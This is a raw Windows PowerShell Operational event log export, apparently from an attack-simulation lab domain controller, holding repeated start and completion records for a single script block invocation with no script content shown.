SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470951
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470950
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470949
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470948
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470947
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470946
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470945
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470944
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470943
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470942
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470941
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470940
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470939
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470938
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470937
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470936
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470935
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470934
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470933
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470932
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470931
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470930
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470929
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470928
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470927
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470926
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470925
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470924
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470923
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470922
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470921
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470920
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470919
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470918
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470917
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470916
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470915
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470914
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470913
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470912
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470911
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470910
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470909
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470908
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470907
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470906
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470905
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470904
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470903
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470902
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470901
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470900
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470899
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470898
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470897
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
